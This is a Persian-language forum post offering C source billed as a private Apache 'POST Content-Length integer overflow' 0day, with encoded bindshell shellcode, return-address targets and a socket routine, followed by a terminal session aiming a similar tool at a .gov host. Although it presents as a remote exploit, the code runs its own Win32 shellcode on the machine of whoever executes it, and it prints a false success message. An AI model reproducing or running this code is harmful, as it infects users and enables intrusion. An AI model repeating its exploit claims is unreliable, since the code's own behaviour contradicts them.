به زبان c هست :
توضیحات :
کد:
/* [!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!] [!Division by Infinity!] presents , , /\ /\ /( )\ /( /\ )\ _\ \_/ /_ \ \_/ / , /\ , |\_||_/| < \_ _/ > /_ _\ /| || |\ \______/ \|0 0|/ | \> </ | |\_||_/| _\/_ _(_ ^ _)_ (_ ^ _) \____/ ( () ) /`\|V"""V|/`\ /`\|IIIII|/`\ _\/_ {} \ \_____/ / \ \_____/ / () () /\ )=( /\ /\ )=( /\ () {} / \_/\=/\_/ \ / `-.\=/.-' \ () Apache <= 2.x POST Content-Length integer overflow !0DAY! by Mindphuck/[!DBI!] This is fsck1n pr1v8, r3l34z3 d1z t0 th3 wh1th8 c0mmUn1ty 4nd w3 w1ll t34r y0ur fuqin h34d 0v!1! [!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!] */ // Fixed compile bugs for GCC compiller, untested... KOrUPt. #include <windows.h> #include <stdlib.h> #include <stdio.h> //linux bindshell on port 4444 const char* scode1 = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x30" "\x2c\xd6\x7f\x83\xeb\xfc\xe2\xf4\x01\xf7\x85\x3c\x63\x46\xd4\x15" "\x56\x74\x4f\xf6\xd1\xe1\x56\xe9\x73\x7e\xb0\x17\x21\x70\xb0\x2c" "\xb9\xcd\xbc\x19\x68\x7c\x87\x29\xb9\xcd\x1b\xff\x80\x4a\x07\x9c" "\xfd\xac\x84\x2d\x66\x6f\x5f\x9e\x80\x4a\x1b\xff\xa3\x46\xd4\x26" "\x80\x13\x1b\xff\x79\x55\x2f\xcf\x3b\x7e\xbe\x50\x1f\x5f\xbe\x17" "\x1f\x4e\xbf\x11\xb9\xcf\x84\x2c\xb9\xcd\x1b\xff"; //win32 bindshell on port 4444 const char* scode2 = "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa0" "\xa7\x83\x65\x83\xeb\xfc\xe2\xf4\x5c\xcd\x68\x28\x48\x5e\x7c\x9a" "\x5f\xc7\x08\x09\x84\x83\x08\x20\x9c\x2c\xff\x60\xd8\xa6\x6c\xee" "\xef\xbf\x08\x3a\x80\xa6\x68\x2c\x2b\x93\x08\x64\x4e\x96\x43\xfc" "\x0c\x23\x43\x11\xa7\x66\x49\x68\xa1\x65\x68\x91\x9b\xf3\xa7\x4d" "\xd5\x42\x08\x3a\x84\xa6\x68\x03\x2b\xab\xc8\xee\xff\xbb\x82\x8e" "\xa3\x8b\x08\xec\xcc\x83\x9f\x04\x63\x96\x58\x01\x2b\xe4\xb3\xee" "\xe0\xab\x08\x15\xbc\x0a\x08\x25\xa8\xf9\xeb\xeb\xee\xa9\x6f\x35" "\x5f\x71\xe5\x36\xc6\xcf\xb0\x57\xc8\xd0\xf0\x57\xff\xf3\x7c\xb5" "\xc8\x6c\x6e\x99\x9b\xf7\x7c\xb3\xff\x2e\x66\x03\x21\x4a\x8b\x67" "\xf5\xcd\x81\x9a\x70\xcf\x5a\x6c\x55\x0a\xd4\x9a\x76\xf4\xd0\x36" "\xf3\xf4\xc0\x36\xe3\xf4\x7c\xb5\xc6\xcf\x92\x39\xc6\xf4\x0a\x84" "\x35\xcf\x27\x7f\xd0\x60\xd4\x9a\x76\xcd\x93\x34\xf5\x58\x53\x0d" "\x04\x0a\xad\x8c\xf7\x58\x55\x36\xf5\x58\x53\x0d\x45\xee\x05\x2c" "\xf7\x58\x55\x35\xf4\xf3\xd6\x9a\x70\x34\xeb\x82\xd9\x61\xfa\x32" "\x5f\x71\xd6\x9a\x70\xc1\xe9\x01\xc6\xcf\xe0\x08\x29\x42\xe9\x35" "\xf9\x8e\x4f\xec\x47\xcd\xc7\xec\x42\x96\x43\x96\x0a\x59\xc1\x48" "\x5e\xe5\xaf\xf6\x2d\xdd\xbb\xce\x0b\x0c\xeb\x17\x5e\x14\x95\x9a" "\xd5\xe3\x7c\xb3\xfb\xf0\xd1\x34\xf1\xf6\xe9\x64\xf1\xf6\xd6\x34" "\x5f\x77\xeb\xc8\x79\xa2\x4d\x36\x5f\x71\xe9\x9a\x5f\x90\x7c\xb5" "\x2b\xf0\x7f\xe6\x64\xc3\x7c\xb3\xf2\x58\x53\x0d\x50\x2d\x87\x3a" "\xf3\x58\x55\x9a\x70\xa7\x83\x65"; char* sc = NULL; char* hellcode = NULL; struct Target { char* Ident; char* RetAddr; }; struct Target TR[8] = { "Windows XP 5.1.0.0 SP0 (IA32)", "\x1c\x80\xf5\x77", // jmp *%esp @ ntdll.dll "Windows NT 4.0.6.0 SP6 (IA32)", "\x63\xD4\xF9\x77", // jmp *%esp @ ntdll.dll "Windows 2000 5.0.1.0 SP1 (IA32)", "\xAB\x67\xF9\xFF", // jmp *%esp @ ntdll.dll "Windows 2003 Server 5.2.0.0 SP0 (IA32)", "\xAB\x8B\xFB\x77", // jmp *%esp @ ntdll.dll "Windows 2003 Server 5.2.1.0 SP1 (IA32)", "\xD3\xFE\x86\x7C", // jmp *%esp @ ntdll.dll "Windows XP 5.1.2.0 SP2 (IA32)", "\xED\x1E\x94\x7C", // jmp *%esp @ ntdll.dll "Linux 2.4.x Kernel", "\x25\xE7\xFF\xFF", // jmp *%esp @ linux-gate.so.1 "Linux 2.6.x Kernel", "\x77\xE7\xFF\xFF", // jmp *%esp @ linux-gate.so.1 }; void SetHellcode(int TG) { if(TG > 5) // linux { hellcode = (char*)malloc(strlen(scode1)); memset(hellcode,0,strlen(scode1)); strcpy(hellcode,scode1); } else // windows { hellcode = (char*)malloc(strlen(scode2)); memset(hellcode,0,strlen(scode2)); strcpy(hellcode,scode2); } } void ConstructBuffer(int TG) { int i; SetHellcode(TG); sc = (char*)malloc(strlen(hellcode)); memset(sc,0,strlen(hellcode)); for(i = 4; i < 1024; i++) sc[i] = 0x90; // NOP-sled for(i = 0; i < 4; i++) sc[i+1024] = TR[TG].RetAddr[i]; strncpy(sc+1028,hellcode,strlen(hellcode)); // shellcode int (*f)() = (int(*)())scode2; DWORD dwThread; HANDLE th = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)f, NULL, 0, &dwThread); WaitForSingleObject(th, INFINITE); } void Usage() { int x = 0; printf("Usage: lulz.exe <Target> <Port> <Details>\n"); printf("[*]Detail list: \n"); for(x = 0; x < 8; x++) printf("[%d]%s\n",x,TR[x].Ident); printf("\nExample: lulz.exe localhost 80 1\n"); exit(1); } int main(int argc, char *argv[]) { SOCKET s; struct sockaddr_in sin; struct hostent *he; char buffer[2048]; char *p2; int x = 0; unsigned short iPort = 80; WSADATA wsa_prov; printf("[!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!]\r\n"); printf("[!Priv8 Apache <= 2.x Exploit!]\r\n"); printf("[! by Mindphuck/[!DBI!] !]\r\n"); printf("[! Apache <= 2.x POST Content-Length integer overflow!]\r\n"); printf("[! Leads to remote code execution !]\r\n"); printf("[!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!]\r\n"); if(argc < 4) Usage(); iPort = atoi(argv[2]); x = atoi(argv[3]); if(x < 0 || x > 7) { printf("[-]Invalid Details ...\n"); exit(1); } printf("[*]Attacking %s:%d running %s...\n",argv[1],iPort,TR[x].Ident); ConstructBuffer(x); if (WSAStartup(0x0101, &wsa_prov)) { perror("[-]WSAStartup error"); exit(1); } he = gethostbyname(argv[1]); if (!he) { perror("gethostbyname"); exit(1); } sin.sin_addr.s_addr = *((unsigned long *)he->h_addr); memset(buffer,0,2048); sprintf(buffer,"POST /index.php HTTP/1.0\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s\r\n",0x7FFFFFFF,sc); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { perror("[-]Socket error..."); exit(1); } sin.sin_family = AF_INET; sin.sin_port = htons(iPort); if (connect(s, (const struct sockaddr*)&sin, sizeof(struct sockaddr_in))) { perror("[-]Connection error..."); exit(1); } if(send(s, buffer, 2048, 0)) printf("[+]Exploit successfull, shellcode executed ...\n[+]h4rzh4rz, t4rg3t pWn3d!1!11!\n"); else printf("[-]Send error...\n"); closesocket(s); WSACleanup(); if(hellcode) free(hellcode); if(sc) free(sc); exit(0); }
کد:
pi3-darkstar ~ # gcc Apache_0day.c -o Apache_0day pi3-darkstar ~ # ./Apache_0day -h ...::: -=[ Apache 2.2.xx 0day exploit (by Adam 'pi3' Zabrocki) ]=- :::... Usage: ./Apache_0day <options> Options: -v <victim> -p <port> -h this help screen pi3-darkstar ~ # ./Apache_0day -v xxx.gov